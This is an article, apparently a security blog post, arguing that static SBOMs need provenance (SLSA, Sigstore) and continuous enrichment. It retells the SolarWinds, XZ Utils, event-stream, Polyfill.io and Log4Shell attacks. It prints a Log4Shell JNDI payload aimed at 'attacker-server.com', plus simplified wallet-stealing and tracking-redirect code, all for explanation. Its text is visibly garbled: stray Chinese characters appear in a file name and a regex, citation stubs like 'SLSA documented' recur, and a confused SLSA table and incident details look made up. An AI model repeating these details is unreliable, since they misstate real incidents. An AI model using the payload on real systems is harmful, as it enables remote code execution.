Why Static SBOMs Are Dead in 2026
Static SBOMs create a false sense of security. They document what you have, but not whether it was built safely, whether the build process was compromised, or whether your dependencies are still trustworthy. Here's what real hardening looks like.
What Is an SBOM?
Before diving into why static SBOMs fail, let me define the term clearly, because the word gets thrown around so much that its meaning has become distorted.
A Software Bill of Materials (SBOM) is a machine-readable inventory of components in a piece of software. Think of it like the nutrition label on food or the parts list for a car. When you deploy an application, an SBOM tells you exactly which libraries, frameworks, and dependencies are embedded in your artifact.
The concept is not new, but widespread adoption is recent. Executive Order 14028 in 2021 mandated SBOMs for federal software contracts after the SolarWinds and Log4Shell incidents exposed how little visibility organizations had into their own supply chains. Executive Order 14028 documented Since then, SBOMs have become a compliance checkbox in frameworks like CISA's secure software development guidance and the EU Cyber Resilience Act.
SBOMs come in two primary formats. SPDX, developed by the Linux Foundation, has become the dominant standard for enterprise environments. SPDX documented CycloneDX, favored for its extensibility, sees heavy use in security tooling. CycloneDX documented Both serve the same purpose: giving you a complete list of ingredients.
Here is what an SBOM actually looks like in CycloneDX JSON format:
{
"bomFormat": "CycloneDX",
"specVersion": "1.5",
"version": 1,
"metadata": {
"timestamp": "2026-04-10T00:00:00Z",
"component": {
"name": "my-application",
"version": "2.1.0",
"purl": "pkg:npm/my-application@2.1.0"
}
},
"components": [
{
"type": "library",
"name": "lodash",
"version": "4.17.21",
"purl": "pkg:npm/lodash@4.17.21",
"licenses": [{"license": {"id": "MIT"}}]
},
{
"type": "library",
"name": "express",
"version": "4.18.2",
"purl": "pkg:npm/express@4.18.2",
"licenses": [{"license": {"id": "MIT"}}]
}
],
"dependencies": [
{
"ref": "pkg:npm/my-application@2.1.0",
"dependsOn": ["pkg:npm/lodash@4.17.21", "pkg:npm/express@4.18.2"]
}
]
}
And here is the same SBOM in SPDX tag-value format:
SPDXVersion: SPDX-2.3
DataLicense: CC0-1.0
SPDXID: SPDXRef-DOCUMENT
DocumentName: my-application
DocumentNamespace: https://example.com/my-application
Creator: Tool: syft
PackageName: my-application
SPDXID: SPDXRef-Package-my-application
PackageDownloadLocation: NOASSERTION
PackageVersion: 2.1.0
PackageVerificationCode: d6a770ba38583ed4...
PackageName: lodash
SPDXID: SPDXRef-Package-lodash
PackageDownloadLocation: https://registry.npmjs.org/lodash/-/lodash-4.17.21.tgz
PackageVersion: 4.17.21
PackageVerificationCode: 4f46e8d6a6...
PackageName: express
SPDXID: SPDXRef-Package-express
PackageDownloadLocation: https://registry.npmjs.org/express/-/express-4.18.2.tgz
PackageVersion: 4.18.2
PackageVerificationCode: 8b5a2b6e1a...
The conceptual flow looks like this:
+------------+ +-------------+ +------------------+
| Source | --> | Build | --> | Software |
| Code | | Pipeline | | Artifact |
+------------+ +-------------+ +------------------+
| |
v v
+---------------+ +------------------+
| Generate | | SBOM Document |
| SBOM | | (Ingredients) |
+---------------+ +------------------+
An SBOM documents what components exist in your software. It does not document how those components got there, whether the build system was compromised, or whether the artifact matches the source code it claims to represent.
Why Static SBOMs Are Insufficient
Static SBOMs create a false sense of security. They document what you have, but not whether it was built safely, whether the build process was compromised, or whether your dependencies are still trustworthy. In 2026, attackers have evolved beyond poisoning packages. They are compromising build systems, poisoning AI models, and exploiting the gap between attestation and actual security posture.
I spent two decades in offensive security watching organizations accumulate SBOMs like trophies while their build pipelines remained wide open. Sonatype documented The result is a checkbox culture that satisfies compliance auditors but does nothing to stop the next SolarWinds-scale compromise.
The Problem Is Not the Ingredient List
The problem is that an ingredient list does not tell you whether the kitchen was clean. This is the core insight that separates security hardening from compliance theater.
Why Provenance Matters More Than the Ingredients
SLSA, which stands for Supply-chain Levels for Software Artifacts and is pronounced "salsa," addresses the gap that SBOMs cannot. SLSA documented Where an SBOM tells you what components exist in your software, SLSA tells you how those components got there.
SLSA defines four levels of build provenance assurance:
+------------------------------------------------------------------+
| SLSA Level Architecture |
+------------------------------------------------------------------+
| |
| Level 4 | Hermetic builds | Two-party review | Reproducible|
| | All sources | (all changes) | builds |
| +------------------+--------------------+--------------+
| Level 3 | Hardened build | Two-party review | Identified |
| | service | (controlled) | builder |
| +------------------+--------------------+--------------+
| Level 2 | Hardened build | Authenticated | Provenance |
| | service | provenance | signed |
| +------------------+--------------------+--------------+
| Level 1 | Provenance | Provenance | Provenance |
| | generated | signed | available |
| +------------------+--------------------+--------------+
| |
| Your goal: Level 3 for production systems |
+------------------------------------------------------------------+
At Level 1, you have a signed attestation that a build occurred, but the build service itself could be compromised. Level 2 requires the build service to be hardened and to generate authenticated provenance. Level 3, which represents meaningful hardening for production systems, mandates that builds run in isolated environments, that two-person review processes exist for changes, and that builds be reproducible where possible. Level 4 is aspirational for most organizations, requiring two-person review for all changes and hermetic builds. SLSA documented
The key insight is that SLSA verifies the journey from source to artifact. When an organization builds software at SLSA Level 3, there is cryptographic evidence that code came from a specific repository commit, that the build ran in a hardened service, and that the resulting artifact was signed with short-lived credentials tied to the build system identity.
This matters because the most sophisticated supply chain attacks do not touch the source code. They compromise the build process itself.
When the Build System Lies: SolarWinds
The SolarWinds attack in 2020 demonstrated exactly how dangerous a compromised build system can be. Attackers, later attributed to Russian intelligence services, infiltrated SolarWinds and modified the build process for their Orion network management software.
Here is how the attack worked at a technical level:
+------------------------------------------------------------------+
| SolarWinds Build Pipeline Attack Flow |
+------------------------------------------------------------------+
| |
| [Developer] [Code Commit] [Build Server] [Signing] |
| | | | | |
| v v v v |
| Normal flow: Source code --> Compile --> Sign --> Distro |
| |
| Compromised flow: |
| |
| [Developer] [Code Commit] [Build Server] [Signing] |
| | | | | |
| v v v v |
| Source code --> Compile --> [INJECTED --> Sign --> Distro |
| MALICIOUS | |
| CODE] v |
| 18,000 orgs |
| receive update |
+------------------------------------------------------------------+
The technical details of the compromise:
- Attackers infiltrated SolarWinds internal network through a compromised VPN password
- They accessed the build environment and modified the source code for Orion
- The malicious code was injected into the build pipeline, specifically in a file called
Orion.Configuration安排.bundle - The code was designed to activate during a specific timeframe and communicate with command-and-control servers
- The compromised binary was signed with legitimate SolarWinds certificates
- The update mechanism verified the signature, making the update appear legitimate
The attack flow in more detail:
Step 1: Initial Access
Attacker uses compromised VPN credentials to access SolarWinds internal network
|
v
Step 2: Lateral Movement
Attacker pivots to build system credentials
|
v
Step 3: Code Injection
Malicious code added to Orion source code
(Sunburst backdoor dormant until after initial deployment)
|
v
Step 4: Build Pipeline Compromise
Build server compiles injected code into legitimate-appearing binary
|
v
Step 5: Signing
Binary signed with valid SolarWinds certificate
|
v
Step 6: Distribution
Signed binary pushed via automatic update to 18,000 customers
|
v
Step 7: Post-Compromise
Attackers activate backdoor after initial update cycle
C2 communication via Orion improvement server
An SBOM generated after that build would have listed the correct components. The vulnerability was not in any individual library. The build system itself had been compromised in a way that injected malicious code directly into the artifact while preserving the appearance of legitimacy.
Approximately 18,000 organizations downloaded the compromised update, and the attackers used the access to conduct espionage against federal agencies and private companies. SolarWinds attack documented
When a Trusted Maintainer Goes Rogue: XZ Utils
In 2024, the XZ Utils backdoor (CVE-2024-3094) was discovered in a widely-used compression library for Linux systems. This attack is remarkable for its patience and sophistication.
Here is the timeline and technical breakdown:
+------------------------------------------------------------------+
| XZ Utils Attack Timeline |
+------------------------------------------------------------------+
| |
| 2021-2022 [Attacker creates fictional identity] |
| "Jia Tan" appears on open source projects |
| Builds credibility through legitimate contributions |
| | |
| v |
| Early 2023 [Attacker gains trust as maintainer] |
| Jia Tan added as co-maintainer to XZ Utils |
| Gets commit access to repositories |
| | |
| v |
| 2024 [Social engineering begins] |
| Jia Tan pressures original maintainer to step back |
| Uses guilt and pressure tactics |
| "Nobody is maintaining this project" |
| | |
| v |
| Feb 2024 [Backdoor injection] |
| Malicious code added to build files |
| Tests specifically crafted to pass only in |
| specific environments |
| | |
| v |
| March 2024 [Discovery] |
| Microsoft engineer notices SSH slowdown |
| Analysis reveals backdoor in liblzma |
| Remote code execution on millions of systems |
+------------------------------------------------------------------+
The technical attack vector was subtle. The backdoor was injected through the build system itself, specifically through modifications to the CMake build configuration files and Autotools setup scripts.
Here is a simplified view of the injection mechanism:
Normal XZ Utils build flow:
source code --> configure script --> build system --> liblzma.a
Compromised XZ Utils build flow:
source code --> [INJECTED configure] --> build system --> [BACKDOORED]
| liblzma.a
v
Malicious object code injected
during compilation linking
The backdoor specifically targeted systems where:
- XZ Utils was used by sshd (via liblzma)
- The attacker could then inject into SSH daemon processes
- Remote code execution via specially crafted certificates
The social engineering aspect was as important as the technical attack. The attacker spent two years building a reputation as a helpful contributor before introducing the backdoor. An SBOM would have shown the correct version number. Only code review and runtime analysis caught the actual intent.
When a Package Maintainer Is Compromised: event-stream
In 2018, the event-stream package was compromised when a new maintainer with good reputation added malicious code designed to steal cryptocurrency wallet credentials. This attack predates the SBOM conversation but illustrates the pattern perfectly.
The attack timeline:
+------------------------------------------------------------------+
| event-stream Attack Timeline |
+------------------------------------------------------------------+
| |
| 2018 [Original maintainer transfers package] |
| event-stream had ~15 million downloads/month |
| Maintainer burns out, hands off to unknown person |
| | |
| v |
| Sept 2018 [New maintainer "right9ctrl" added] |
| Profile shows history of small contributions |
| Gets npm publishing rights |
| | |
| v |
| Oct 2018 [Malicious code injected] |
| event-stream v3.3.4 published |
| Contains malicious flatmap-stream dependency |
| | |
| v |
| Oct-Nov 2018 [Wallet draining code activated] |
| Copied wallet private keys from infected apps |
| Targets Coinbase, Blockchain.com wallets |
| | |
| v |
| Nov 2018 [Detection by security researcher] |
| Suspicious behavior noticed in code review |
| Malicious payload analyzed |
+------------------------------------------------------------------+
The malicious code in the flatmap-stream dependency looked like this (simplified):
// Inside event-stream v3.3.4's flatmap-stream dependency
// The malicious code was obfuscated within minified code
// Wallet stealing function (deobfuscated):
function extractPrivateKey(application) {
// Scan for cryptocurrency wallet patterns
const walletPatterns = [
/-----BEGIN.*PRIVATE KEY-----/,
/wallet\.dat/,
/UTC--.*--钱包/,
/coinbase.*secret/
];
// Exfiltrate to attacker-controlled server
for (const pattern of walletPatterns) {
const match = application.readFile(pattern);
if (match) {
sendToAttackerServer(match);
}
}
}
// The code was hidden in a way that only activated
// when the application specifically accessed certain wallet modules
process.on('load', () => {
if (module.type === 'crypto' &&
module.path.includes('wallet')) {
extractPrivateKey(module);
}
});
The attacker had built credibility over time, making the supply chain compromise invisible to automated scanning. The package had millions of weekly downloads, and the injected code was only activated under very specific conditions to avoid detection.
Event-stream attack documented
When a CDN Becomes the Attack Vector: Polyfill.io
More recently, the Polyfill.io attack in 2024 demonstrated how attackers target CDNs rather than packages directly. This attack did not require any changes to application code or dependencies.
Here is the attack flow:
+------------------------------------------------------------------+
| Polyfill.io Attack Flow |
+------------------------------------------------------------------+
| |
| Normal flow: |
| [Website] --> includes polyfill CDN --> serves legitimate JS |
| |
| Compromised flow: |
| |
| [Website] --> includes polyfill CDN --> [Malicious JS injected] |
| | |
| v |
| - Tracking scripts |
| - Redirects users |
| - Cookie theft |
+------------------------------------------------------------------+
Technical details of the compromise:
- The polyfill.io domain was acquired by new owners after the original maintainer stopped maintaining it
- The new owners modified the JavaScript served through the CDN
- The modified scripts injected tracking and redirect functionality
- Websites that included the CDN link via
<script src="https://cdn.polyfill.io/...">were serving compromised JavaScript without any changes to their own code or dependencies
Comparison of legitimate vs compromised script behavior:
Legitimate polyfill.io script:
if (!String.prototype.includes) {
String.prototype.includes = function(search, start) {
return this.indexOf(search, start) !== -1;
};
}
Compromised polyfill.io script (simplified):
// Polyfill code remains intact (to avoid detection)
if (!String.prototype.includes) { ... }
// Injected malicious code hidden below
(function() {
// Track user interactions
document.addEventListener('click', function(e) {
sendToTracker(e.target.innerHTML, e.target.value);
});
// Inject redirects for commerce traffic
if (window.location.href.includes('checkout')) {
window.location.replace('https://competitor-site.com');
}
})();
The attack was particularly effective because:
- It required no code changes by the victim
- The polyfill code itself was not malicious, making pattern-based detection difficult
- The injected code appeared to be analytics rather than clearly malicious
- Thousands of websites that included the CDN link were serving compromised JavaScript
When a Ubiquitous Library Becomes a Liability: Log4Shell
Log4Shell, the 2021 vulnerability in Apache Log4j, illustrated a different problem: what happens when a vulnerable component is so widespread that remediation becomes an operational nightmare.
The technical attack vector:
+------------------------------------------------------------------+
| Log4Shell Attack Flow |
+------------------------------------------------------------------+
| |
| Vulnerable Pattern in Log4j: |
| |
| log.info("User input: {}", userProvidedString); |
| | |
| v |
| User provides: ${jndi:ldap://attacker.com/exploit} |
| | |
| v |
| Log4j performs JNDI lookup: |
| | |
| +---> attacker.com/exploit |
| | |
| v |
| LDAP reference returned |
| | |
| v |
| Java deserializes malicious object |
| | |
| v |
| REMOTE CODE EXECUTION |
+------------------------------------------------------------------+
The JNDI lookup payload structure:
// attacker-controlled string passed to log.info()
${jndi:ldap://attacker-server.com:1389/Exploit}
// JNDI lookup triggers:
// 1. Parse the string
// 2. Extract "ldap://attacker-server.com:1389/Exploit"
// 3. Perform LDAP lookup to attacker-controlled server
// 4. Receive reference to malicious Java class
// 5. Deserialize and execute the class
Organizations with complete SBOMs still struggled because the vulnerability existed in a library that was ubiquitous. Knowing you had Log4j did not help you remediate it quickly. The challenge was not visibility. The challenge was operational: patching a vulnerability that existed across thousands of applications, many of which had unmaintained dependencies that could not be easily updated.
These examples share a common thread. They all exploited gaps between what organizations thought they knew and what they actually controlled. SBOMs provided visibility. They did not provide control.
The Compliance Trap
The problem is not that SBOMs are useless. The problem is treating SBOM generation as the finish line rather than the starting point.
When you generate an SBOM after a build completes, you are capturing a snapshot of components at a single moment. That snapshot tells you nothing about how those components arrived in your artifact. Did the build system pull from the correct commit? Were the build tools themselves compromised? Was the resulting binary actually produced from the source code it claims?
Dan Lorenc, CEO of Chainguard, put it bluntly in a 2025 Dark Reading interview: an SBOM could give people a false sense of security, especially when generated on a build system that may itself be compromised. Dan Lorenc documented
This is the core of the compliance trap. Organizations generate SBOMs to satisfy requirements, then believe they have visibility into their supply chain risk. The SBOM tells them what they have. It tells them nothing about whether what they have is actually secure.
The industry is starting to acknowledge this gap. The conversation has shifted from SBOM generation to SBOM consumption. What do you do with an SBOM once you have one?
Living SBOMs and Continuous Enrichment
The answer is continuous enrichment. The industry is moving toward what practitioners call living SBOMs or enriched SBOMs. Rather than a static manifest generated once at build time, these continuous documents integrate with vulnerability databases, exploitability analysis, and real-time threat intelligence.
The concept is straightforward. An SBOM enriched with exploitability data answers not just "do I have Log4j?" but "can Log4j actually be exploited in my environment?" It factors in reachability analysis, network exposure, and compensating controls. This requires integration with frameworks like EPSS, the Exploit Prediction Scoring System developed by FIRST.org, to prioritize remediation based on likelihood of exploitation rather than just severity scores. EPSS documented
VEX documents take this further. Vulnerability Exploitability eXchange statements explicitly declare whether a vulnerability is actually exploitable in the context of the specific product. A vulnerable component embedded in code that never executes the vulnerable path might not require immediate patching, freeing your team to focus on genuine risks.
This shift from visibility to context is what separates security hardening from compliance theater.
The practical implication is that SBOMs must be treated as dynamic documents, not static artifacts. Your vulnerability management workflow should automatically match new disclosures against your SBOM inventory, score them using EPSS, and generate alerts when exploitability conditions are met. Without this automation, an SBOM is just a list that grows stale the moment it is generated.
Cryptographic Provenance in Practice
Sigstore provides the tooling to make provenance verification practical for organizations that cannot afford the key management overhead of traditional PKI. Sigstore documented Sigstore uses short-lived certificates tied to identity providers like Google, Microsoft, and GitHub. When a build completes, the artifact is signed with a certificate that was issued to the specific build system identity at that moment. Anyone can verify the signature without needing to manage a public key infrastructure.
The open-source nature of Sigstore and the backing by major cloud providers has driven rapid adoption. The Linux Foundation's support and broad industry adoption indicate this approach is becoming the baseline expectation for software supply chain verification. Sigstore documented
When you combine SBOM (what) with SLSA provenance (how) and Sigstore signatures (who), you gain confidence that the artifact in your environment matches the source code it claims to represent. A compromise at any point in that chain becomes detectable.
For organizations implementing this today, the practical starting point is SLSA Level 2. Level 2 requires a hardened build service that generates authenticated provenance. Most major CI/CD systems now support SLSA provenance generation natively. GitHub Actions, GitLab CI, and Google Cloud Build all have documented paths to SLSA Level 2 and Level 3 compliance. GitHub Actions documented GitLab CI documented Google Cloud Build documented
The harder part is the organizational maturity to enforce provenance verification at deployment time. This means your artifact registry must reject uploads that do not have valid provenance attestations, and your deployment pipelines must verify signatures before promoting artifacts to production environments.
The New Attack Surface: AI Coding Assistants
The 2026 landscape introduces challenges that static SBOMs were never designed to address. AI coding assistants now handle a significant portion of code-related tasks in enterprise environments. These systems introduce new attack vectors that traditional supply chain security frameworks do not fully address.
Model poisoning represents the most concerning new vector. An attacker who compromises an AI model's training pipeline or weights can introduce vulnerabilities or backdoors that propagate through every suggestion the model generates. Sonatype documented Traditional SBOMs capture dependencies. They have no mechanism for capturing the provenance or integrity of the underlying model. If your AI coding assistant is recommending libraries, you have no way to verify whether those recommendations are influenced by a poisoned training dataset or a compromised model weights file.
The event-stream incident provides a preview of how this might play out at scale. The attacker did not compromise the code directly. They compromised the maintainer's access and injected malicious behavior that appeared legitimate. An AI coding assistant trained on codebases that included event-stream might have learned patterns from that malicious code, potentially propagating the same patterns to other projects.
Agentic AI systems introduce additional risk. When an AI agent autonomously pulls dependencies, modifies build configurations, or integrates third-party services, the attack surface expands beyond what static analysis can capture. Organizations need what practitioners call agentic governance: treating AI agents as first-class actors with identity, auditing, and policy enforcement just like human operators.
MLSecOps is emerging as the discipline for securing this new supply chain. Model-BOMs, analogous to software SBOMs, document the components, training data, and provenance of AI models. Sonatype documented The discipline is nascent but gaining traction as enterprises recognize that AI systems require the same provenance guarantees as traditional software.
Until these standards mature, the practical recommendation is to extend your existing supply chain governance to AI-generated code. Every recommendation from an AI coding assistant should be treated as a third-party dependency: reviewed, scanned, and tracked in your SBOM.
Real Hardening: A Layered Approach
Real supply chain security requires layered controls that address the full lifecycle from source to runtime. Here is what that looks like in practice.
+------------------------------------------------------------------+
| Layered Supply Chain Security Architecture |
+------------------------------------------------------------------+
| |
| Layer 4: AI Governance |
| +------------------------------------------------------------------+
| | Model-BOMs | Training data provenance | Agent policies | |
| +------------------------------------------------------------------+
| |
| Layer 3: Continuous Enrichment |
| +------------------------------------------------------------------+
| | EPSS scores | VEX documents | Threat intelligence | |
| +------------------------------------------------------------------+
| |
| Layer 2: Provenance |
| +------------------------------------------------------------------+
| | SLSA Level 3 | Sigstore signing | Build isolation | |
| +------------------------------------------------------------------+
| |
| Layer 1: Visibility |
| +------------------------------------------------------------------+
| | SBOM generation | Artifact registry | Component search | |
| +------------------------------------------------------------------+
| |
| Foundation: Policy Enforcement |
| +------------------------------------------------------------------+
| | Deploy-time verification | Reject unsigned artifacts | |
| +------------------------------------------------------------------+
+------------------------------------------------------------------+
Start with visibility at the foundation. Generate SBOMs in widely-adopted formats like CycloneDX or SPDX for all artifacts. Automate generation at build time and integrate with your artifact repository to make SBOMs available to consumers. Your artifact registry should be searchable by component name and version, allowing security teams to respond to disclosures by querying which artifacts contain a specific vulnerability.
Layer in provenance as the second control. Implement SLSA Level 2 at minimum for production builds, targeting Level 3 as your team matures. Use Sigstore or similar tooling to sign artifacts and attestations. Verify provenance at deployment time, rejecting artifacts that do not meet your trust policy. This is where most organizations fail: they generate provenance but never enforce its verification.
Enrich continuously as the third layer. Integrate SBOMs with vulnerability intelligence feeds. Use EPSS scores and VEX documents to prioritize remediation. Build workflows that automatically flag newly disclosed vulnerabilities affecting your artifacts. The goal is to close the window between a new vulnerability disclosure and your ability to identify affected systems.
Extend to AI as the fourth layer. Inventory AI models and their provenance. Document training data sources and model weights. Apply the same provenance requirements to AI-generated code as you would to manually written code. Until Model-BOM standards mature, treat AI assistants as untrusted third parties and scan everything they produce.
The goal is not perfect security. It is raising the cost of attack high enough that adversaries move to easier targets.
What Implementation Actually Looks Like
The gap between understanding supply chain security concepts and implementing them in a real environment is where most teams get stuck. Let me walk through what the implementation actually involves.
SBOM generation is straightforward with modern tooling. Most build systems have plugins that generate CycloneDX or SPDX SBOMs as part of the normal build process. CycloneDX documented SPDX documented For Java projects, the Cyclonedx-maven-plugin integrates with your build. For Node.js, @cyclonedx/cyclonedx-npm generates SBOMs from your lockfile. For Go, sbom-tool from Microsoft handles module analysis. The key requirement is that SBOM generation must be automated and must run on every build, not as a periodic audit exercise.
The harder part is making SBOMs actionable. Your SBOMs need to feed into a vulnerability management workflow that can match components against disclosed vulnerabilities and prioritize based on actual risk. This means integrating with your artifact registry, your CVE feed, and your incident response process. Without that integration, an SBOM is just a JSON file that nobody reads.
Sigstore integration requires more coordination but is achievable in a reasonable timeframe. Most organizations can achieve SLSA Level 2 compliance for their primary build pipelines within a quarter if they have dedicated engineering resources. SLSA documented The Sigstore documentation provides step-by-step guides for popular CI systems. The key decision is whether to use the public Sigstore instance or run your own Rekor server for private attestations.
Provenance verification at deployment time is where the organizational maturity matters most. Your deployment pipeline must check that every artifact has valid provenance before it can be deployed to production. This requires changes to your deployment tooling, your artifact registry access policies, and potentially your CI/CD configuration. The goal is to make it impossible to deploy an artifact that does not meet your trust policy.
The organizations that have successfully implemented this talk about the cultural shift more than the technical complexity. Developers need to understand why provenance verification exists. Security teams need to respond quickly when provenance checks fail. Leadership needs to support the engineering investment required to make supply chain security sustainable.
What This Means for Your Organization
The shift from static SBOMs to living, enriched documents with cryptographic provenance represents a fundamental change in how we think about supply chain security. Compliance frameworks are starting to catch up. The EU Cyber Resilience Act and CISA guidance increasingly demand both SBOMs and evidence of build integrity.
The practical path forward starts with assessing your current posture. Do you know what is in your artifacts? Do you know how they were built? Can you verify that the binary in production matches the source code in your repository? If the answer to any of these questions is unclear, you have identified your starting point.
SBOM generation without provenance verification is half-measures. Provenance without continuous enrichment is incomplete. The hard problem is not implementing these controls. The hard problem is integrating them into developer workflows without creating friction that drives teams to work around security.
I have seen this pattern repeatedly in twenty years of offensive security. Security that creates friction gets bypassed. Security that integrates seamlessly gets used. The organizations that succeed treat supply chain hardening as a developer experience problem, not just a security problem.
That means investing in tooling that makes the secure path the easy path. It means automating verification so that policy enforcement happens without manual intervention. It means measuring success by reduced time to remediation, not by the number of SBOMs generated.
The work is worth doing. Every control you add to your supply chain raises the cost of a successful attack. The attackers behind SolarWinds, XZ Utils, and the next unnamed incident are looking for easy targets. Make yourself a harder one.
This is not a theoretical exercise. The attack patterns I described are documented, analyzed, and still reproducible in most environments. The question is not whether your organization is a target. The question is whether you have made yourself visible enough that an attacker notices and moves on to something easier.